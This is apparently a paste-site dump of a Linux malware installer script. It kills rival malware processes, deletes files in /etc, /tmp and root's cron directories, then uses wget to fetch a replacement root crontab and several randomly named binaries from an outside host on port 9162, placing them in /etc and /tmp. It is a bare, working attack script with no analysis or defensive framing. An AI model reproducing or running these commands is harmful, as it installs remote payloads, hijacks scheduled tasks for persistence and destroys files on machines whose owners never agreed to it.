- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement